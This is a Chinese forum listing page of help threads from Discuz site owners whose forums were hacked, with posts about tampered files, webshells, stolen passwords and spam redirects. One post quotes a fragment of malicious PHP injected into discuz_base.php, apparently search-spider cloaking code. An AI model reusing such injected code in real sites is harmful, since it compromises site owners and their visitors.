·设为首页收藏本站📧邮箱修改🎁免费下载专区📒收藏夹📱AI全功能
×

00:00:00

您有一张10元限时体验卡,马上领取获得VIP尊享特权。

凡是没有更新到最新版的discuz,都会这么提示吗?

2023-01-14 23:10 来自 迪巴拉 发布@ Discuz!问题求助

28103

你使用的版本有非常严重的安全漏洞,看起来有点恐怖,大家都用的是最新版本吗?你们都提示什么?

因为更改了很多的文件,每次更新版本都头疼,自己都不记得哪些文件是之前改过的.一更新,


我知道答案 回答被采纳将会获得5 金币 已有1人回答

为什么又被黑了?

2022-04-23 09:02 来自 xiao9469 发布@ Discuz!问题求助

10484

被篡改了31个文件

请问各位大神:这是什么问题?

是不是有后门或者是被植入了木马程序?

升级3.5后用华为云扫描出漏洞

2023-07-12 12:39 来自 左右不逢缘 发布@ Discuz!问题求助

升级3.5后 用华为云扫描出几个轻微漏洞。


42729

我知道答案 回答被采纳将会获得1 贡献 已有4人回答

qq互联插件qqconnect疑似被黑

2023-06-06 18:53 来自 逝水年华 发布@ Discuz!问题求助

39680
近来百度网站快照一直有被黑的内容,查看下文件的修改时间最可疑就是qqconnect  5月27日其中这个文件显示有被修改过
截图是疑似问题的代码,目前这个插件已经删除。想请团队成员帮看看是否该文件存在问题,如果这个文件有问题是否有潜在漏洞呢?




我知道答案 回答被采纳将会获得1 贡献 已有4人回答

source\class\discuz\discuz_base.php文件被修改了

2021-04-17 16:06 来自 左右不逢缘 发布@ Discuz!问题求助

source\class\discuz\discuz_base.php文件被修改了,被加了代码,如下:
set_time_limit(30);
error_reporting(0);
$tr = "stristr";
$er = $_SERVER;
function httpGet($url) {
  $ch = curl_init();

  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)');
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt(

DZ3.4最新版,又被黑了!

2021-03-11 09:18 来自 逝水年华 发布@ Discuz!问题求助

从 3.2到3.3到3.4 都被黑过,3.3被黑了很多次,木马多的都找不完了,一狠心 删除了所有插件,直接全新安装了3.4 ,好几个月都没问题,结果前几天发现又被黑了。uc_server密码被窃取。uc_server/data/tmp下发现一个图片文件,下载下来没有发现图片里包含php代码,uc_server应用里多了两个应用。指向了用户上传头像目录下的图片文件,也没发现里面包含php代码。 很好奇uc_server的密码是怎么泄露的。 大神告知一下,是服务器设置不够安全,还是dz的漏洞一直没修复。每次都这样被黑,服务器都重新安装好几次了!

X3.4停止更新后,出现安全漏洞病毒名为“bk.webshell.leonrisk.14006053”的入侵该怎么办 New

2025-12-26 19:44 来自 𝕷𝖎𝖑𝖏𝖆𝖈𝖐 发布@ Discuz! X3.5专区

Discuz! X3.4出现安全漏洞,病毒名:“bk.webshell.leonrisk.14006053”的入侵,它是PHP Webshell‌ 恶意后门程序,常通过网站上传漏洞(如文件上传、SQL注入)植入服务器,用于远程执行命令、窃取数据或作为跳板攻击内网。


       搜了一下,Discuz! 3.4(DZ3.4)系统,该版本为官方于2014年发布的旧版社区程序,‌自2020年起已停止所有安全更新与官方支持‌,存在大量已公开的高危漏洞,极易被攻击者利用植入 Webshell(如 bk.webshell.leonrisk.14006053)。


我知道答案 回答被采纳将会获得1 贡献 已有3人回答

社区 Discuz! X3.5 Release 20231221 UTF-8 手机端出现点击分类会跳转到色情网站,大神们这个如何解决! New

2025-08-01 10:51 来自 𝕷𝖎𝖑𝖏𝖆𝖈𝖐 发布@ Discuz! X3.5专区

社区电脑端页面都正常,手机端出现点击分类会跳转到色情网站,大神们这个如何解决!(在电脑上显示手机端也会跳转其它网站,说明不是手机的问题。)


只要多次点击圈圈位置就会跳转到其它色情网站,请大神给个处理思路和方法。

我知道答案 回答被采纳将会获得1 贡献 已有8人回答

附件下载权限的问题 New

2024-12-18 09:31 来自 哥斯拉 发布@ Discuz!问题求助

用有权限的账号  右点附件链接地址  然后复制到任何地方 都可以下载这个附件 正常不?我知道答案 回答被采纳将会获得1 贡献 已有0人回答

请大神来解决个问题:收费附件总是被别人修改成免费

2022-07-27 20:24 来自 逝水年华 发布@ Discuz!问题求助

不知道是有后门还是中毒
反正收费附件总是被别人修改成免费
搞得都木有心情分享出来东西了
我知道答案 回答被采纳将会获得5 金币 已有0人回答

朋友开发的插件,在应用中心上架了,他可以直接打包给我用吗?会有啥情况发生? New

2026-03-19 14:29 来自 𝕷𝖎𝖑𝖏𝖆𝖈𝖐 发布@ Discuz! X3.5专区

如题。


我知道答案 回答被采纳将会获得1 贡献 已有0人回答

致命问题:希望discuz 更新增强实名验证的问题。。

2021-06-16 10:51 来自 𝕷𝖎𝖑𝖏𝖆𝖈𝖐 发布@ Discuz!问题求助

discuz 发展快20年了, 而且目前也都2021年了
对于社区用户的实名认证 一直没什么进展,
用户一直都在依托到第三方插件
而且主流的实名认证插件都被绕过,
我自己就用了3款插件被绕过
而且这些插件对PC和手机的兼容都不同 也不友善!
所以 实名制的东西 还是原生的比较好!!

因为discuz属于交流交互性的, 避免不了有人发布一些恶性舆论信息,被WXB请喝茶也是常事。
最尴尬的是查询不到用户的实名信息 这个才是最大的隐患。。。

希望官方大牛们更新框架的时候增强一下实名认证的东西吧 打通下阿里云和腾讯云的短信验证等接口
取消或者可选性的邮箱注册

都2021年了哪有几个终端客户知道邮箱是什么呢???

作为社区性质  实名认证是最为重要性的。而且也是致命的作用  实名认证 我认为是框架中的最基本功能对吧

希望官方考虑下

因为这个实名问题我今年被请喝茶三次了
而且 好多客户因为这个问题 被处罚和关站了!
实名问题不处理好 会有更多的站长涉及到以上问题的

文件都没有被篡改,可是收费的附件都被改成免费了

2022-05-11 23:10 来自 xiao9469 发布@ Discuz!问题求助

文件都没有被篡改,可是收费的附件都被改成免费了

如图:10920

文件没有被篡改,管理员的账号也是只能QQ登录(管理员没有发现被登录)

是不是有后门?还是被爆破了数据库?

请问各位大神

阿里云提示:Discuz! 后台数据库备份功能命令执行漏洞

2020-12-22 11:03 来自 𝕷𝖎𝖑𝖏𝖆𝖈𝖐 发布@ Discuz!问题求助

阿里云提示:Discuz! 后台数据库备份功能命令执行漏洞,
我是最新版的
Discuz! 程序版本
Discuz! X3.4 R20200818 UTF-8
升级之前还没有提示呢

首页总是被篡改,有时候一天都会出现2-3次

2020-08-07 13:29 来自 左右不逢缘 发布@ Discuz!问题求助

求大神指点下这到底是怎么回事,如何解决!谢谢
2056
最新热评 加载中...
投诉/建议联系

discuzaddons@vip.qq.com

未经授权禁止转载,复制和建立镜像,
如有违反,按照公告处理!!!
  • 联系QQ客服
  • 添加微信客服

联系DZ插件网微信客服|最近更新|Archiver|手机版|小黑屋|DZ插件网! ( 鄂ICP备20010621号-1 )|网站地图 知道创宇云防御

您的IP:216.73.216.31, 36.158.231.68,GMT+8, 2026-7-7 11:21 , Processed in 0.397878 second(s), 70 queries , Gzip On, Redis On.

Powered by Discuz! X5.1 Licensed

© 2001-2026 Discuz! Team.

关灯
扫一扫添加微信客服
QQ客服返回顶部
返回顶部